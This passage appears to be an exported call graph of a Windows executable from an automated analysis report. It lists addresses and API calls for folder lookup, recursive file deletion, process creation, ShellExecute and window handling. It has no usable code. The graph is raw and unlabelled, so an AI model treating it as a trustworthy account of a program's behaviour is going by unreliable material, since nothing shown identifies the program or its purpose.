27855->27856 27857 406cb2 27856->27857 27858 4299b0 2 API calls 27857->27858 27858->27847 27860 428df0 RtlReAllocateHeap 27859->27860 27861 406d0f 27860->27861 27862 4299b0 2 API calls 27861->27862 27863 406d20 SHGetSpecialFolderLocation SHGetPathFromIDListW 27862->27863 27864 406d48 27863->27864 27865 406d9f 27863->27865 27866 428c10 RtlReAllocateHeap 27864->27866 27867 429950 2 API calls 27865->27867 27869 406d5d 27866->27869 27868 406dad 27867->27868 27870 429a70 HeapFree 27868->27870 27869->27865 27872 429950 2 API calls 27869->27872 27871 406dce 27870->27871 27871->26785 27873 406d8b 27872->27873 27874 429950 2 API calls 27873->27874 27875 406d95 27874->27875 27876 4299b0 2 API calls 27875->27876 27876->27865 27878 428df0 RtlReAllocateHeap 27877->27878 27879 4066e6 27878->27879 27880 4299b0 2 API calls 27879->27880 27881 4066f7 SHGetSpecialFolderLocation SHGetPathFromIDListW 27880->27881 27882 406776 27881->27882 27883 40671f 27881->27883 27885 429950 2 API calls 27882->27885 27884 428c10 RtlReAllocateHeap 27883->27884 27887 406734 27884->27887 27886 406784 27885->27886 27888 429a70 HeapFree 27886->27888 27887->27882 27890 429950 2 API calls 27887->27890 27889 4067a5 27888->27889 27889->26791 27891 406762 27890->27891 27892 429950 2 API calls 27891->27892 27893 40676c 27892->27893 27894 4299b0 2 API calls 27893->27894 27894->27882 27896 428df0 RtlReAllocateHeap 27895->27896 27897 4067c9 27896->27897 27898 4299b0 2 API calls 27897->27898 27899 4067da SHGetSpecialFolderLocation SHGetPathFromIDListW 27898->27899 27900 406802 27899->27900 27901 406859 27899->27901 27903 428c10 RtlReAllocateHeap 27900->27903 27902 429950 2 API calls 27901->27902 27904 406867 27902->27904 27906 406817 27903->27906 27905 429a70 HeapFree 27904->27905 27907 406888 27905->27907 27906->27901 27908 429950 2 API calls 27906->27908 27907->26797 27909 406845 27908->27909 27910 429950 2 API calls 27909->27910 27911 40684f 27910->27911 27912 4299b0 2 API calls 27911->27912 27912->27901 27914 428df0 RtlReAllocateHeap 27913->27914 27915 406a66 27914->27915 27916 4299b0 2 API calls 27915->27916 27917 406a77 SHGetSpecialFolderLocation SHGetPathFromIDListW 27916->27917 27918 406af6 27917->27918 27919 406a9f 27917->27919 27921 429950 2 API calls 27918->27921 27920 428c10 RtlReAllocateHeap 27919->27920 27923 406ab4 27920->27923 27922 406b04 27921->27922 27924 429a70 HeapFree 27922->27924 27923->27918 27926 429950 2 API calls 27923->27926 27925 406b25 27924->27925 27925->26803 27927 406ae2 27926->27927 27928 429950 2 API calls 27927->27928 27929 406aec 27928->27929 27930 4299b0 2 API calls 27929->27930 27930->27918 27932 428df0 RtlReAllocateHeap 27931->27932 27933 406b49 27932->27933 27934 4299b0 2 API calls 27933->27934 27935 406b5a SHGetSpecialFolderLocation SHGetPathFromIDListW 27934->27935 27936 406b82 27935->27936 27937 406bd9 27935->27937 27939 428c10 RtlReAllocateHeap 27936->27939 27938 429950 2 API calls 27937->27938 27940 406be7 27938->27940 27942 406b97 27939->27942 27941 429a70 HeapFree 27940->27941 27943 406c08 27941->27943 27942->27937 27944 429950 2 API calls 27942->27944 27943->26809 27945 406bc5 27944->27945 27946 429950 2 API calls 27945->27946 27947 406bcf 27946->27947 27948 4299b0 2 API calls 27947->27948 27948->27937 27950 428df0 RtlReAllocateHeap 27949->27950 27951 4068ac 27950->27951 27952 4299b0 2 API calls 27951->27952 27953 4068bd SHGetSpecialFolderLocation SHGetPathFromIDListW 27952->27953 27954 4068e5 27953->27954 27955 40693c 27953->27955 27957 428c10 RtlReAllocateHeap 27954->27957 27956 429950 2 API calls 27955->27956 27958 40694a 27956->27958 27959 4068fa 27957->27959 27960 429a70 HeapFree 27958->27960 27959->27955 27962 429950 2 API calls 27959->27962 27961 40696b 27960->27961 27961->26815 27963 406928 27962->27963 27964 429950 2 API calls 27963->27964 27965 406932 27964->27965 27966 4299b0 2 API calls 27965->27966 27966->27955 27968 428df0 RtlReAllocateHeap 27967->27968 27969 40635a 27968->27969 27970 4299b0 2 API calls 27969->27970 27971 40636b SHGetSpecialFolderLocation SHGetPathFromIDListW 27970->27971 27972 406393 27971->27972 27973 4063ea 27971->27973 27975 428c10 RtlReAllocateHeap 27972->27975 27974 429950 2 API calls 27973->27974 27976 4063f8 27974->27976 27978 4063a8 27975->27978 27977 429a70 HeapFree 27976->27977 27979 406419 27977->27979 27978->27973 27980 429950 2 API calls 27978->27980 27979->26821 27981 4063d6 27980->27981 27982 429950 2 API calls 27981->27982 27983 4063e0 27982->27983 27984 4299b0 2 API calls 27983->27984 27984->27973 27986 428df0 RtlReAllocateHeap 27985->27986 27987 40643d 27986->27987 27988 4299b0 2 API calls 27987->27988 27989 40644e SHGetSpecialFolderLocation SHGetPathFromIDListW 27988->27989 27990 406476 27989->27990 27991 4064cd 27989->27991 27993 428c10 RtlReAllocateHeap 27990->27993 27992 429950 2 API calls 27991->27992 27994 4064db 27992->27994 27996 40648b 27993->27996 27995 429a70 HeapFree 27994->27995 27997 4064fc 27995->27997 27996->27991 27998 429950 2 API calls 27996->27998 27997->26827 27999 4064b9 27998->27999 28000 429950 2 API calls 27999->28000 28001 4064c3 28000->28001 28002 4299b0 2 API calls 28001->28002 28002->27991 28004 428df0 RtlReAllocateHeap 28003->28004 28005 406194 28004->28005 28006 4299b0 2 API calls 28005->28006 28007 4061a5 SHGetSpecialFolderLocation SHGetPathFromIDListW 28006->28007 28008 406224 28007->28008 28009 4061cd 28007->28009 28010 429950 2 API calls 28008->28010 28011 428c10 RtlReAllocateHeap 28009->28011 28012 406232 28010->28012 28013 4061e2 28011->28013 28014 429a70 HeapFree 28012->28014 28013->28008 28016 429950 2 API calls 28013->28016 28015 406253 28014->28015 28015->26833 28017 406210 28016->28017 28018 429950 2 API calls 28017->28018 28019 40621a 28018->28019 28020 4299b0 2 API calls 28019->28020 28020->28008 28022 428df0 RtlReAllocateHeap 28021->28022 28023 406277 28022->28023 28024 4299b0 2 API calls 28023->28024 28025 406288 SHGetSpecialFolderLocation SHGetPathFromIDListW 28024->28025 28026 4062b0 28025->28026 28027 406307 28025->28027 28029 428c10 RtlReAllocateHeap 28026->28029 28028 429950 2 API calls 28027->28028 28030 406315 28028->28030 28032 4062c5 28029->28032 28031 429a70 HeapFree 28030->28031 28033 406336 28031->28033 28032->28027 28034 429950 2 API calls 28032->28034 28033->26839 28035 4062f3 28034->28035 28036 429950 2 API calls 28035->28036 28037 4062fd 28036->28037 28038 4299b0 2 API calls 28037->28038 28038->28027 28040 428b3b 28039->28040 28041 429c80 RtlReAllocateHeap 28040->28041 28042 428b55 28041->28042 28042->26844 28044 428664 28043->28044 28045 42874f 28044->28045 28046 4286f0 28044->28046 28047 42876a 28045->28047 28048 42875d _wcsdup 28045->28048 28049 428722 wcsncpy 28046->28049 28052 409340 28046->28052 28050 428789 28047->28050 28051 42877c _wcsdup 28047->28051 28048->28047 28049->28046 28053 428797 _wcsdup 28050->28053 28055 4287a4 28050->28055 28051->28050 28052->26715 28053->28055 28054 429c80 RtlReAllocateHeap 28056 428815 28054->28056 28055->28054 28057 428857 wcsncpy 28056->28057 28058 42881b 28056->28058 28061 42886a 28056->28061 28057->28061 28059 4288b4 free 28058->28059 28060 4288bd 28058->28060 28059->28060 28062 4288d1 28060->28062 28063 4288c4 free 28060->28063 28061->28058 28065 428901 wcsncpy 28061->28065 28062->28052 28064 4288d8 free 28062->28064 28063->28062 28064->28052 28065->28061 28067 410241 28066->28067 28068 410151 28067->28068 28069 410267 WideCharToMultiByte HeapAlloc 28067->28069 28070 41025f 28067->28070 28068->26874 28068->26875 28071 410298 28069->28071 28072 41029c WideCharToMultiByte 28069->28072 28070->28069 28071->28068 28073 4102b4 28072->28073 28074 4102e3 28073->28074 28075 4102cd _stricmp 28073->28075 28074->28068 28076 4102f2 HeapFree 28074->28076 28075->28073 28075->28074 28076->28068 28990 41c20e 28989->28990 28999 41c49c 28989->28999 28991 41c217 wcsncpy wcslen 28990->28991 28990->28999 28992 41c255 wcscpy 28991->28992 28993 41c23a 28991->28993 28995 41c281 28992->28995 28996 41c37a 28992->28996 28993->28992 28994 41c242 wcscat 28993->28994 28994->28992 28995->28996 28998 41c28b wcscmp 28995->28998 28997 41c380 wcscpy wcscat FindFirstFileW 28996->28997 28997->28999 29007 41c3bf 28997->29007 28998->28996 29000 41c29c 28998->29000 28999->26950 29000->28997 29002 41c2a6 wcscpy wcscat FindFirstFileW 29000->29002 29001 41c3ca wcscpy wcscat 29001->29007 29003 41c371 29002->29003 29004 41c2e4 wcscpy wcscat 29002->29004 29003->28997 29009 41c354 FindNextFileW 29004->29009 29010 41c316 wcscmp 29004->29010 29005 41c458 DeleteFileW 29008 41c465 FindNextFileW 29005->29008 29006 41c44e SetFileAttributesW 29006->29005 29007->29001 29007->29005 29007->29006 29007->29008 29013 41c408 wcscmp 29007->29013 29008->29001 29012 41c47d FindClose 29008->29012 29009->29004 29011 41c36a FindClose 29009->29011 29010->29009 29014 41c32d wcscmp 29010->29014 29011->29003 29016 41c496 29012->29016 29017 41c48c SetFileAttributesW 29012->29017 29013->29008 29018 41c41f wcscmp 29013->29018 29014->29009 29015 41c344 29014->29015 29015->29009 29016->28999 29019 41c4a5 RemoveDirectoryW 29016->29019 29017->29016 29018->29007 29018->29008 29019->28999 29021 426bf8 29020->29021 29022 426b99 GetFileSize RtlAllocateHeap 29020->29022 29021->25670 29023 426bb9 ReadFile 29022->29023 29024 426bed FindCloseChangeNotification 29022->29024 29025 426bdf RtlFreeHeap 29023->29025 29026 426bcd 29023->29026 29024->29021 29025->29024 29026->29025 29029 426ffb 29026->29029 29030 426def 33 API calls 29029->29030 29031 426bdc 29030->29031 29031->29025 29032->26978 29033->26987 29035 4291e2 29034->29035 29036 4291cb 29034->29036 29038 429c80 RtlReAllocateHeap 29035->29038 29036->29035 29037 4291d2 29036->29037 29042 4290e0 RtlReAllocateHeap 29037->29042 29041 4291ef 29038->29041 29040 4291dd 29040->27006 29041->27006 29042->29040 29044 40fa16 29043->29044 29045 40fa29 29043->29045 29044->29045 29046 40fa20 CloseHandle 29044->29046 29048 40fa3a CreateFileW 29045->29048 29057 40fa5a 29045->29057 29046->29045 29047 40fbf3 29053 40fc0a 29047->29053 29074 428590 HeapFree 29047->29074 29052 40fa58 29048->29052 29048->29057 29049 40fbd5 29050 40fbeb FindCloseChangeNotification 29049->29050 29051 40fbdd HeapFree 29049->29051 29050->29047 29051->29050 29052->29057 29055 40fc20 29053->29055 29056 40fc12 HeapFree 29053->29056 29058 40fc35 memset 29055->29058 29059 40fc27 HeapFree 29055->29059 29056->29055 29057->29047 29057->29049 29060 40fac2 29057->29060 29063 40faab strlen 29057->29063 29064 40fa8e strlen strlen 29057->29064 29058->27066 29059->29058 29061 40fac6 SetFilePointer SetEndOfFile 29060->29061 29062 40fade HeapAlloc 29060->29062 29061->29049 29062->29049 29065 40fafb 29062->29065 29063->29057 29064->29057 29066 40fb06 strcpy strlen 29065->29066 29068 40fb1e 29065->29068 29066->29068 29067 40fb9e SetFilePointer WriteFile SetEndOfFile HeapFree 29067->29049 29068->29067 29069 40fb2b strcpy strcat 29068->29069 29071 40fb64 strcpy strcat 29068->29071 29072 40fb4b strcpy strcat 29068->29072 29070 40fb79 strcat 29069->29070 29073 40fb82 strcat strlen 29070->29073 29071->29070 29072->29073 29073->29068 29074->29047 29076 4242e4 29075->29076 29077 4242ee 29075->29077 29106 424fb1 HeapAlloc 29076->29106 29079 427e22 3 API calls 29077->29079 29080 4242fc 29079->29080 29107 431fc0 _vsnwprintf 29080->29107 29083 424323 memset RegisterClassW 29084 42438c AdjustWindowRectEx 29083->29084 29086 424413 29084->29086 29087 424461 29086->29087 29088 42442a GetSystemMetrics 29086->29088 29091 4244b7 CreateWindowExW 29087->29091 29094 424477 GetWindowRect 29087->29094 29095 42446d GetActiveWindow 29087->29095 29089 424437 29088->29089 29090 42443a GetSystemMetrics 29088->29090 29089->29090 29099 424451 29090->29099 29092 4244f1 SetPropW 29091->29092 29093 4245ac UnregisterClassW 29091->29093 29097 424507 ShowWindow 29092->29097 29098 424529 HeapAlloc CreateAcceleratorTableW 29092->29098 29096 427f10 2 API calls 29093->29096 29094->29099 29095->29091 29095->29094 29100 4245cd 29096->29100 29097->29098 29102 4245a1 29098->29102 29103 42459a 29098->29103 29099->29091 29100->25858 29102->29100 29108 4321c6 8 API calls _strftime 29103->29108 29106->29077 29107->29083 29108->29102 29110 4200fa _strftime 29109->29110 29111 42016c CreateWindowExW 29110->29111 29112 42010c memset GetSystemMetrics GetSystemMetrics 29110->29112 29113 4201a0 SetWindowLongW 29111->29113 29114 4201d9 29111->29114 29112->29111 29115 427e22 3 API calls 29113->29115 29114->25862 29116 4201c1 29115->29116 29120 42352c 29116->29120 29121 42353e _strftime 29120->29121 29122 42354d SetWindowLongW SetWindowLongW SetPropW SendMessageW 29121->29122 29128 420278 _strftime 29127->29128 29129 420288 memset 29128->29129 29130 4202db CreateWindowExW 29128->29130 29129->29130 29132 420329 29130->29132 29133 402d18 29130->29133 29134 427e22 3 API calls 29132->29134 29133->27150 29135 420337 29134->29135 29136 42352c 4 API calls 29135->29136 29136->29133 29477 415420 ftell 29478 416a20 free 29479 4154a0 fclose 29480 4153e0 fread 29481 412980 29482 41299c 29481->29482 29483 41298f 29481->29483 29482->29483 29485 4129af 29482->29485 29493 412690 free free 29482->29493 29486 4129db malloc 29485->29486 29487 4129cd 29485->29487 29488 4129ef malloc 29486->29488 29492 412a27 29486->29492 29489 412a1e free 29488->29489 29490 412a36 29488->29490 29489->29492 29491 412bc7 free 29490->29491 29490->29492 29493->29485 29494 40f5a1 memset 29495 40f5ff 29494->29495 29496 40f628 29495->29496 29497 40f641 CreatePipe 29495->29497 29498 40f6f1 29496->29498 29501 40f685 CreatePipe 29496->29501 29502 40f6b8 29496->29502 29497->29496 29499 40f658 29497->29499 29500 40f720 wcslen wcslen HeapAlloc 29498->29500 29505 40f701 GetStdHandle 29498->29505 29506 40f708 29498->29506 29563 40f56a GetCurrentProcess GetCurrentProcess DuplicateHandle CloseHandle 29499->29563 29515 40f767 wcscpy wcscat wcscat 29500->29515 29516 40f78a wcscpy 29500->29516 29501->29502 29507 40f69c 29501->29507 29502->29498 29503 40f6be CreatePipe 29502->29503 29503->29498 29510 40f6d5 29503->29510 29505->29506 29512 40f714 29506->29512 29513 40f70d GetStdHandle 29506->29513 29564 40f56a GetCurrentProcess GetCurrentProcess DuplicateHandle CloseHandle 29507->29564 29565 40f56a GetCurrentProcess GetCurrentProcess DuplicateHandle CloseHandle 29510->29565 29511 40f669 29511->29496 29512->29500 29518 40f719 GetStdHandle 29512->29518 29513->29512 29514 40f6ad 29514->29502 29519 40f793 29515->29519 29516->29519 29518->29500 29521 40f7b4 CreateProcessW 29519->29521 29522 40f79b wcscat wcscat 29519->29522 29520 40f6e6 29520->29498 29524 40f877 29521->29524 29525 40f7ef 29521->29525 29522->29521 29526 40f881 29524->29526 29527 40f87c CloseHandle 29524->29527 29528 40f7f4 CloseHandle 29525->29528 29529 40f7f9 29525->29529 29530 40f886 CloseHandle 29526->29530 29531 40f88b 29526->29531 29527->29526 29528->29529 29532 40f803 29529->29532 29533 40f7fe CloseHandle 29529->29533 29530->29531 29536 40f890 CloseHandle 29531->29536 29537 40f895 29531->29537 29534 40f808 CloseHandle 29532->29534 29535 40f80d CloseHandle 29532->29535 29533->29532 29534->29535 29538 40f823 29535->29538 29539 40f818 WaitForSingleObject 29535->29539 29536->29537 29540 40f89a CloseHandle 29537->29540 29541 40f89f 29537->29541 29544 40f828 EnterCriticalSection 29538->29544 29545 40f86d CloseHandle 29538->29545 29539->29538 29540->29541 29542 40f8a4 CloseHandle 29541->29542 29543 40f8a9 29541->29543 29542->29543 29546 40f8b3 29543->29546 29547 40f8ae CloseHandle 29543->29547 29566 4285d0 HeapAlloc 29544->29566 29549 40f98c 29545->29549 29550 40f9a1 HeapFree 29546->29550 29552 40f8c2 wcslen 29546->29552 29553 40f8fb memset ShellExecuteExW 29546->29553 29547->29546 29549->29550 29551 40f840 LeaveCriticalSection 29551->29549 29552->29553 29554 40f8d1 29552->29554 29553->29550 29555 40f941 29553->29555 29554->29553 29558 40f8e1 wcscpy 29554->29558 29556 40f952 29555->29556 29557 40f947 WaitForSingleObject 29555->29557 29559 40f991 CloseHandle 29556->29559 29560 40f957 EnterCriticalSection 29556->29560 29557->29556 29558->29553 29559->29549 29567 4285d0 HeapAlloc 29560->29567 29562 40f96f LeaveCriticalSection 29562->29549 29563->29511 29564->29514 29565->29520 29566->29551 29567->29562 29568 431900 malloc 29569 40c6a4 SHGetSpecialFolderLocation 29570 40c756 29569->29570 29571 40c6d6 29569->29571 29572 429950 2 API calls 29570->29572 29573 428df0 RtlReAllocateHeap 29571->29573 29574 40c74d 29572->29574 29575 40c6e7 29573->29575 29577 429a70 HeapFree 29574->29577 29576 4299b0 2 API calls 29575->29576 29578 40c6f1 SHGetPathFromIDListW 29576->29578 29579 40c788 29577->29579 29589 4295a0 29578->29589 29582 429950 2 API calls 29583 40c726 29582->29583 29592 4295c0 CharUpperW RtlReAllocateHeap 29583->29592 29585 40c734 29586 4299b0 2 API calls 29585->29586 29587 40c73e 29586->29587 29588 429950 2 API calls 29587->29588 29588->29574 29593 4294d0 RtlReAllocateHeap 29589->29593 29591 40c71c 29591->29582 29592->29585 29593->29591 29594 421bc5 29595 421bce 29594->29595 29596 421be8 CallWindowProcW 29595->29596 29598 4235da 8 API calls _strftime 29595->29598 29598->29596 29599 42346f GetWindowLongW 29600 423516 DefWindowProcW 29599->29600 29601 42348b 29599->29601 29603 423510 29600->29603 29602 423498 CallWindowProcW 29601->29602 29602->29603 29604 4234b9 RemovePropW RemovePropW 29602->29604 29606 4234e0 RevokeDragDrop 29604->29606 29607 4234e7 SetWindowLongW 29604->29607 29606->29607 29611 4259ae EnterCriticalSection HeapFree LeaveCriticalSection _strftime 29607->29611 29609 423501 29610 427f10 2 API calls 29609->29610 29610->29603 29611->29609 29612 42162d 29613 4216e9 CallWindowProcW GetPropW GetWindowLongW 29612->29613 29614 42163f 29612->29614 29615 42171f 29613->29615 29628 42169d 29613->29628 29616 4216b2 RemovePropW HeapFree 29614->29616 29617 421644 29614->29617 29623 42172f 29615->29623 29615->29628 29618 4216cf CallWindowProcW 29616->29618 29619 421647 29617->29619 29620 421674 29617->29620 29618->29628 29619->29618 29621 42164f CallWindowProcW 29619->29621 29620->29618 29622 42167a CallWindowProcW 29620->29622 29636 421514 8 API calls 29621->29636 29629 42143e 29622->29629 29637 421331 SendMessageW SendMessageW SendMessageW 29623->29637 29627 42166f 29627->29628 29630 421456 29629->29630 29631 42150e 29629->29631 29630->29631 29632 42146d memset GetParent GetDC 29630->29632 29631->29628 29633 4214a2 29632->29633 29634 4214a6 InflateRect GetPropW memcpy 29633->29634 29635 4214f8 GetParent ReleaseDC 29633->29635 29634->29635 29635->29631 29636->29627 29637->29628 29638 415430 29639 415439 29638->29639 29640 41547d fseek 29638->29640 29641 415462 fseek 29639->29641 29642 41543e 29639->29642 29643 415443 29642->29643 29644 415447 fseek 29642->29644 29645 415390 29646 4153a1 29645->29646 29647 4153d6 29646->29647 29648 4153ca fopen 29646->29648 29649 423451 29650 423460 29649->29650 29651 423464 DestroyWindow 29650->29651 29652 42346c 29650->29652 29651->29652 29653 420cf6 29654 420d03 GetWindowLongW 29653->29654 29655 420d46 CallWindowProcW 29653->29655 29656 420d33 DefWindowProcW 29654->29656 29657 420d14 GetClientRect FillRect 29654->29657 29658 420d5d 29655->29658 29656->29658 29657->29658 29659 41fdb4 GetWindowLongW 29660 41fdd5 29659->29660 29661 41fde7 29660->29661 29662 41ff9b 29660->29662 29665 41fded 29661->29665 29681 41ff39 29661->29681 29663 41ffa7 29662->29663 29664 4200b5 SetCapture 29662->29664 29667 4200a3 29663->29667 29668 41ffb3 29663->29668 29666 4200c9 CallWindowProcW 29664->29666 29669 41fdf8 29665->29669 29670 41ff2b 29665->29670 29676 41fe1e 29666->29676 29667->29666 29675 4200aa ReleaseCapture 29667->29675 29677 42007e 29668->29677 29683 41ffcb 29668->29683 29671 41fe01 29669->29671 29672 41ff14 RedrawWindow 29669->29672 29719 41fd52 7 API calls 29670->29719 29678 41fe0a 29671->29678 29679 41ffef 29671->29679 29672->29676 29674 41ff80 ReleaseCapture 29720 4235da 8 API calls _strftime 29674->29720 29675->29666 29677->29676 29723 4235da 8 API calls _strftime 29677->29723 29678->29676 29680 41fe17 29678->29680 29686 41fe26 29678->29686 29687 41fff4 BeginPaint 29679->29687 29695 420001 29679->29695 29680->29666 29680->29676 29681->29666 29681->29674 29684 41ffd7 29683->29684 29685 42006a 29683->29685 29684->29666 29684->29679 29722 4235da 8 API calls _strftime 29685->29722 29689 41fe3b 29686->29689 29714 426172 DeleteObject 29686->29714 29687->29695 29692 41fe59 29689->29692 29715 425ecc 11 API calls 29689->29715 29717 41fd52 7 API calls 29692->29717 29694 420030 29694->29676 29700 42005b EndPaint 29694->29700 29695->29676 29695->29694 29698 420032 GetObjectType DrawStateW 29695->29698 29699 42001f 29695->29699 29697 41fe66 29697->29676 29702 41fe72 GetObjectType 29697->29702 29698->29694 29721 426184 GetObjectW CreateCompatibleDC SelectObject DeleteDC SelectObject 29699->29721 29700->29676 29701 41fe4b 29701->29692 29716 425fae 6 API calls 29701->29716 29704 41fe8d GetIconInfo 29702->29704 29705 41fe7e GetObjectW 29702->29705 29707 41febb GetWindowLongW 29704->29707 29708 41fe9c GetObjectW DeleteObject DeleteObject 29704->29708 29705->29707 29709 41fed3 29707->29709 29710 41feda SetWindowPos 29707->29710 29708->29707 29709->29710 29718 425ecc 11 API calls 29710->29718 29712 41fef4 29712->29676 29713 41fef8 InvalidateRect UpdateWindow 29712->29713 29713->29676 29714->29689 29715->29701 29716->29692 29717->29697 29718->29712 29719->29680 29720->29680 29721->29694 29722->29676 29723->29676 29724 421f34 SendMessageW 29725 421f4c 29724->29725 29726 424f1b 29735 424a65 29726->29735 29729 424f8c SetLastError 29731 424f78 29729->29731 29732 424f9e DefWindowProcW 29729->29732 29730 424f3d GetPropW 29730->29729 29734 424f4d 29730->29734 29732->29731 29733 424f82 DefFrameProcW 29733->29731 29734->29731 29734->29733 29736 424a7b _strftime 29735->29736 29791 42516e 29736->29791 29739 424aa4 GetPropW 29740 424ab9 GetParent 29739->29740 29741 424ac9 29739->29741 29740->29739 29740->29741 29742 424e25 29741->29742 29743 424b2e 29741->29743 29748 424b05 29741->29748 29747 424e89 29742->29747 29759 424d05 29742->29759 29744 424da1 29743->29744 29745 424b34 29743->29745 29839 4249ef GetPropW GetWindowLongW 29744->29839 29749 424cd6 29745->29749 29750 424b3d 29745->29750 29770 424ebd PostMessageW 29747->29770 29841 4258f1 EnterCriticalSection HeapAlloc HeapAlloc LeaveCriticalSection _strftime 29747->29841 29748->29729 29748->29730 29754 424d7a 29749->29754 29755 424cdf 29749->29755 29752 424b43 29750->29752 29753 424c79 29750->29753 29751 424db0 29751->29748 29763 424dc7 GetWindowLongW 29751->29763 29776 424df1 29751->29776 29760 424b50 29752->29760 29768 424b53 29752->29768 29777 424be0 29752->29777 29762 424c83 GetClientRect FillRect 29753->29762 29775 424ca9 29753->29775 29754->29748 29761 424d8c EnumChildWindows 29754->29761 29757 424ce4 29755->29757 29758 424d15 29755->29758 29757->29748 29757->29759 29766 424cf2 RemovePropW 29757->29766 29758->29748 29767 424d2e GetWindowLongW 29758->29767 29759->29748 29842 4249ef GetPropW GetWindowLongW 29759->29842 29760->29768 29769 424b7f 29760->29769 29761->29748 29762->29775 29763->29748 29766->29759 29767->29748 29768->29748 29837 4258f1 EnterCriticalSection HeapAlloc HeapAlloc LeaveCriticalSection _strftime 29768->29837 29773 424b86 GetPropW 29769->29773 29774 424bb5 GetFocus SetPropW 29769->29774 29770->29748 29771 424eba 29771->29770 29781 424b98 SetFocus 29773->29781 29782 424b9f 29773->29782 29783 425717 3 API calls 29774->29783 29838 4258f1 EnterCriticalSection HeapAlloc HeapAlloc LeaveCriticalSection _strftime 29775->29838 29776->29748 29840 42560f 13 API calls 29776->29840 29777->29748 29778 424c49 29777->29778 29779 424bf9 29777->29779 29778->29768 29836 4258f1 EnterCriticalSection HeapAlloc HeapAlloc LeaveCriticalSection _strftime 29778->29836 29779->29768 29786 424c08 29779->29786 29781->29782 29833 4258f1 EnterCriticalSection HeapAlloc HeapAlloc LeaveCriticalSection _strftime 29782->29833 29783->29748 29834 4258f1 EnterCriticalSection HeapAlloc HeapAlloc LeaveCriticalSection _strftime 29786->29834 29789 424c20 29835 4258f1 EnterCriticalSection HeapAlloc HeapAlloc LeaveCriticalSection _strftime 29789->29835 29792 425182 _strftime 29791->29792 29793 425195 29792->29793 29794 4252ed 29792->29794 29798 4251b7 SystemParametersInfoW 29793->29798 29806 424a8f 29793->29806 29795 4252f7 MapWindowPoints 29794->29795 29796 425358 29794->29796 29843 424ff0 29795->29843 29799 425363 29796->29799 29800 425516 29796->29800 29802 4251ce GetWindowRect GetWindowRect GetSystemMetrics GetSystemMetrics GetWindowLongW 29798->29802 29798->29806 29803 42550e ReleaseCapture 29799->29803 29810 425378 29799->29810 29800->29803 29804 42551d 29800->29804 29801 425329 SendMessageW 29844 4250d2 GetWindowLongW GetParent MapWindowPoints MoveWindow 29801->29844 29807 425226 GetWindowLongW 29802->29807 29808 42521e GetSystemMetrics 29802->29808 29803->29806 29804->29806 29809 425524 PostMessageW 29804->29809 29806->29739 29806->29741 29806->29748 29812 425247 29807->29812 29813 425237 GetSystemMetrics 29807->29813 29811 42523d GetSystemMetrics 29808->29811 29809->29806 29814 42553b SetCursorPos 29809->29814 29815 425383 29810->29815 29816 4254b9 GetCursorPos 29810->29816 29817 42524d 6 API calls 29811->29817 29812->29817 29813->29811 29814->29806 29818 42538a 29815->29818 29819 42545c GetCursorPos 29815->29819 29830 4253bc 29816->29830 29832 4253a5 29816->29832 29820 425295 SetCapture PostMessageW 29817->29820 29821 425288 SendMessageW 29817->29821 29823 425409 GetCursorPos 29818->29823 29824 42538d 29818->29824 29819->29830 29819->29832 29826 4252b3 GetCursorPos LoadImageW SetCursor 29820->29826 29827 4252e5 29820->29827 29821->29820 29822 4254e6 29828 425401 29822->29828 29823->29830 29823->29832 29824->29806 29825 425394 GetCursorPos 29824->29825 29825->29830 29825->29832 29826->29806 29827->29806 29846 425120 6 API calls 29828->29846 29830->29822 29830->29828 29830->29832 29845 424fc2 SetCursorPos LoadImageW SetCursor 29832->29845 29833->29748 29834->29789 29835->29748 29836->29768 29837->29748 29838->29748 29839->29751 29840->29748 29841->29771 29842->29748 29843->29801 29844->29827 29845->29806 29846->29806 29847 41e25b 29848 41df6e 29847->29848 29851 4299b0 2 API calls 29848->29851 29872 41e110 29848->29872 29884 41dfc1 29848->29884 29849 41e387 29853 41e424 SendMessageW 29849->29853 29854 41e40c FillRect 29849->29854 29850 41e634 29855 41e947 GetStockObject GetDlgCtrlID 29850->29855 29889 41e905 29850->29889 29856 41e0df 29851->29856 29852 4299b0 2 API calls 29857 41e1b0 29852->29857 29858 41e497 29853->29858 29859 41e44c SendMessageW ImageList_GetIcon 29853->29859 29854->29853 29900 427a50 29855->29900 29894 41f84c HeapFree wcslen HeapAlloc 29856->29894 29896 41f84c HeapFree wcslen HeapAlloc 29857->29896 29866 41e4b0 ImageList_GetIconSize 29858->29866 29867 41e5b3 29858->29867 29859->29858 29863 41ee17 29868 429a70 HeapFree 29863->29868 29864 41ee1d CallWindowProcW 29864->29863 29865 41e9b0 SelectObject 29865->29889 29869 41e4ed 29866->29869 29875 4299b0 2 API calls 29867->29875 29871 41ee52 29868->29871 29876 4299b0 2 API calls 29869->29876 29870 41e0e8 29870->29872 29895 429840 _wcsicmp _wcsicmp _wcsicmp setlocale swscanf 29870->29895 29874 429a70 HeapFree 29871->29874 29872->29852 29872->29884 29873 41e1b9 29873->29884 29897 429840 _wcsicmp _wcsicmp _wcsicmp setlocale swscanf 29873->29897 29879 41ee5b 29874->29879 29880 41e5de SetTextColor SetBkMode 29875->29880 29877 41e4f7 SetTextColor SetBkMode DrawIconEx 29876->29877 29898 428b00 29877->29898 29883 428b00 29880->29883 29886 41e615 DrawTextW 29883->29886 29884->29849 29884->29850 29885 41e5a0 DrawTextW 29887 41e626 29885->29887 29886->29887 29887->29863 29888 41ecc1 29888->29863 29888->29864 29889->29888 29890 41ecc3 29889->29890 29891 41ec35 29889->29891 29890->29888 29893 41ecef GetSysColor 29890->29893 29891->29888 29892 41ec93 InvalidateRect 29891->29892 29892->29888 29893->29888 29894->29870 29895->29872 29896->29873 29897->29884 29899 428b08 29898->29899 29899->29885 29899->29899 29900->29865 29901 40483d 29942 40d0a0 FreeLibrary 29901->29942 29903 404842 29943 40d0fb FreeLibrary 29903->29943 29905 404847 29944 40d12b ClipCursor FreeLibrary 29905->29944 29907 40484c 29965 40d1cc 22 API calls 29907->29965 29909 404851 29945 40d618 22 API calls 29909->29945 29911 404856 29946 40dfbe 17 API calls 29911->29946 29913 40485b 29947 40e124 FreeLibrary 29913->29947 29915 404860 29966 40e18b EnterCriticalSection CloseHandle LeaveCriticalSection HeapFree 29915->29966 29917 404865 29948 40e871 Sleep FreeLibrary memset HeapFree 29917->29948 29919 40486a 29949 40fc62 29 API calls _strftime 29919->29949 29921 40486f 29950 4107e9 DeleteObject memset HeapFree 29921->29950 29923 404874 29951 41157c EnterCriticalSection HeapFree LeaveCriticalSection HeapFree 29923->29951 29925 404879 29952 41b490 17 API calls 29925->29952 29927 40487e 29953 41cb1c 21 API calls 29927->29953 29929 404883 29967 41fcf2 DestroyWindow _strftime 29929->29967 29931 404888 